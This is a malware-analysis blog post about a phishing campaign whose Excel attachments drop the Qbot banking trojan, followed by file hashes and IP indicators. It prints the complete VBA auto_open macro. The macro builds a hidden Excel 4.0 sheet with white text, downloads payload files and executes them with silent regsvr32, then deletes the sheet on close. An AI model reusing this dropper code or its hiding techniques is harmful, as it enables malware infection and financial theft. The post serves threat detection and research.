Advanced Qbot Downloader

Posted on 2021-10-19 by Dmitry Melikov

A few days ago, we discovered a wave of phishing emails with an attached document. The fact is that a considerable number of samples had zero detection on the VT service. While several files had no AV detection for some time, we decided to focus on this wave and explore it in more detail.

Image 1: Graphical Coercive Lure

The lure image prompts the victim to allow editing and allow modification.  

          Image 2: Initial VT Detection

While the VT file scanning service does not reflect the identical result of the anti-virus software in a native system, many samples had zero AV detection on VT for several days. However, this is a dangerous precedent when dozens of samples of the loader of a dangerous banking Qbot are so shallowly detected.

Image 3: Detection Evolution on VT

          Image 4: Malicious sample within InQuest Labs.

Image 4: Malicious sample within InQuest Labs.

InQuest Labs has flagged these files as malicious based on machine learning models and other Deep File Inspection findings.

Sub auto_open()
On Error Resume Next
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption

Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"

Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
Sheets("Sheet777").Range("I10") = UserForm2.Caption
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"

Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"

Application.Run Sheets("Sheet777").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet777").Delete
   Application.DisplayAlerts = True
End Sub

Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function

Image 5: Macro payload.

The image shows that the text font is set to white. This is a popular way to hide the payload from the user's eyes. 

Image 6: Download addresses

In the file, we also find the download addresses at which the QBot payload will be loaded. Qbot, also known as QuackBot, is the most popular banking bot today. Its malicious functionality includes account theft in order to steal money. Below we have provided indicators of system infection that we also collected within InQuest Labs.

IOCs

Files:

3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36
248230865a10bd86ac4f5ca4964d9c5f17dfdfdc2c55c50dcded5858462c7eb9
37e58340a78f593666bb9fc3a70781f97d38acf835b03f376e234fda99e28ecf
3f6ebc5a47a794bafe77b7d2963c3c070b8b3d370dd6bf53e4778242d7613ede
440cc7b49302187aa8fbf587f974df628dc9c2fc8ef753d22c1adaa19441d09d
5828600cecd6ee3004e17ae9b7f65902420c4705940d202525396fe36ca7a781
8603afc12d78fa788759b3b2c2e74d7cad89857f48884ea3658ebc9216446a32
a7c1be1001b21dd311207333cb878fea77781dda4baa351b8dcb2bd503250ae7
ac18ad61ec60a386b652150b243f03f43a5d568dcd1f4b9e0b9a5b4b2f94946f
c1b05465cf714a5e6c716da23adb377f3a6c06080443d3ea89d42b9cfd4c770a
c3917a880b621958e5c9537f6cb447fab1232c7b8568923d4660eba040694cd5
c883881d9f95f78eb782478ca7883f55af6648d0b566e0760f86f7cd2a4c7011
c8d8edb5b44df50270bfb039e68aabe87394551cc74fa16698f497f2abcf1707
d0b56209eea77c0137651a38786090a569b1ed7150102c13be7c0558e11d1918
03948a1d4161142d08c1a23aeb7ae6cbaa7b76cb5102c22fe7b2c3c26c47d52d
10b38107bc32e5d72ea01429f12d02bf158160d1de73167624ffb1ce3826691e
357d800c50cd78627685cca10b9ec3702c249ad9b331d5e7acd2af7e96ac3da2
4c732107405fab4db9d6651d9d1c9846f47d0d4668fde9a060962ef0b0ecf555
5eb57dcca676977c1f6faaa4f7b030bef28b2fd6566713a12fd341af1bc8658e
65020fb517d59c454d4e102b83328de17b195dd50ce22e5fe800150fbe40fc00
ac6d3143d10b41010f2b64a84c8f3be3b965d64a8c4b1a3086149c8b2fa09b02
b9c260fc88e6bc2e6dd5ac64d039557ea6cb5590e39515d5ddfaf62356e2de29
c25cbeb8bac9ce7829e7b79c0a171ed6333ebbfacb6b334c6505b6226773c504
dab5e942098ae9920e9d805a9eca98c311d4ccd24dafc2996a8c39e5d5afec7b
0171a8d6e99df5f45754d3ebb4a029ef4246d9c54d0ab1c3fed8e7efe1f7482b
02c5a0a808809e2015fc5885c6f31c4a953656ca3c83e82b9f30c0bc920986a8
03948a1d4161142d08c1a23aeb7ae6cbaa7b76cb5102c22fe7b2c3c26c47d52d
05578081a76f023f0da16e4193de02bba13fa5680d69131dc5a9249ac05db11e
0d3aa70c63260c5713b4788e13be01a5c6ac3dbf0424243c40e824bde8d1e89e
10b38107bc32e5d72ea01429f12d02bf158160d1de73167624ffb1ce3826691e
1f068139a591ef6571bdc5a9bfe54c04950440abc870c77a9467a3190fc72fe2
27ea142bdbb8854faad6fd9e8796a8c9dc85ee819c5d76d281177327184f1438
2f04bea72ab8891ee15475e8c0953b8f302857007fede9122448bb2dacd2449e
357d800c50cd78627685cca10b9ec3702c249ad9b331d5e7acd2af7e96ac3da2
3737ab8b19a25300104a00588e185728cb47c7d5eff89b910ab4e77a53bad38d
447e38f01b97d7ec6208f41f250cb8d673ae05206174a6da446f7d5438c4c424
448227a4241bcc175eb475c98be590f5980ae6376d5b39617681c17c10a8c9d3
4538d7dd15d0e88fd209a59152515a8f90f8d09649233d20d59cb408945a44a8
48f9f0973ab799ec4444061cf716ab78aa2f713428228d7a3b98c9d41f2a8982
4ac4e35d8690ce67f5f7084422432e77df14896b47c907085c0ba1241b439237
4b6c2759d1b35aecb6f781f1667ae41b16a1c82e94be5ae00b47295e4870c4f7
4c732107405fab4db9d6651d9d1c9846f47d0d4668fde9a060962ef0b0ecf555
5122e94671adc30911eec0bdffb92cb05eb531c4f3594bb074e6e2444b57b1bd
5510da5d64a028b51d4f47f9798735d097226c0bac4f21e62e8ec4052bac6435
578707ac26f0c0c5e53850658637d0152e7e37f3efbfa6f6335ef1fa13490db1
5cb2d098faa298f7e890de8b7c977990a2cdaacdcd2deb1fdc445b4092dd4cfa
5eb57dcca676977c1f6faaa4f7b030bef28b2fd6566713a12fd341af1bc8658e
5f4a4082f8d7d0a81c576e39aee0f43832d66072561390ce2a5e66bf79d9c990
65020fb517d59c454d4e102b83328de17b195dd50ce22e5fe800150fbe40fc00
78bea1b0bbf1fc1956b1b1e0734534df89bc1ca4e4ec4d4a24d5cb503c9f80b5
7efd8b2109661c4072464c840324912c767a475d1d034945c9e0f73c5f6b1279
856f6df43b59c4707a70fc6ba081f3f31fef39d66358be99baccdbfaba6a157b
8ee1dfedb41b0190b4334e457c0345b5334164dcace81d8e9610b81c78f014dc
8f3c970eaa32834ed185ee1c78eedfa582039b4ae967b1883c352b635cdfca61
9e600de5612513a091b8a6a9736ea9670b07a5fbe0af2670f7821210bbfc0400
a168a05750b0a6e826808ce2a00678be2f56e85bafe02643eaf03b70179d73a5
ac6d3143d10b41010f2b64a84c8f3be3b965d64a8c4b1a3086149c8b2fa09b02
b298496c0588aac83d75d696f8948278a51c92c86dc22ad72ba02e4619c47222
b850f5b705d2825a98a23f0935b1218db74a550fea1032a3f64d65451d5d1d7e
b9c260fc88e6bc2e6dd5ac64d039557ea6cb5590e39515d5ddfaf62356e2de29
bb9c2a7ff08e6d529d87c5a701b6e16a266b87f9250ba6540f00cbe99854e2b1
c25cbeb8bac9ce7829e7b79c0a171ed6333ebbfacb6b334c6505b6226773c504
c650645f9e0d44a3be1e5dee3ad16f86a20a1a08535a08227be93807032a7aec
c7f2ab86b1b6f4475390792eea3c241909fb2015c5e3c3fda44765342184a60d
c8c2eec23a13bfb14cda079ab0523b770612d7d7ba9ac206702cc499d0414727
d7dc4022a9dec65cf101bc29745c2568e8ed15d6df7de270a76bd09b8dff050e
dab5e942098ae9920e9d805a9eca98c311d4ccd24dafc2996a8c39e5d5afec7b
e2120f5a1b1873d28f8a164c7fcffc068e17c5157a2b20c10037fba105eadfd8
e48fb8b1cfd0d8b83b78d158993eb36bd501a68026f4529b462e9b16d06a6c02
e93615c244bd19bf9f25cc324108203515f0381ef0d25953b15945da1def8483
ec589839260fc322e3e4b9aa391c7b0415dc79f0e2f2ca64b9175be81b390085
f29efffa4d8b33f8bee89331ad924ea98477b42d487f7e0143037bdbe2b50bed
f4ca148c7559e1335422700f23a0749888df16b8ef0ad7a8a0d70334f509f069
fbe607f5229b1e7208fbf93573bb0f79eb972d11a06aca48362bd3f6a480ec99
fd1a3e28a42375f76baa4debf1afc267846db3e83b10ded478af2a8e5b9a46f3

IPs:

101.99.90.115
185.183.96.67
185.250.148.213
190.14.37.178
194.36.191.13
23.106.122.207
101.99.90.98
94.140.112.144
Tags
in-the-wild labs threat-hunting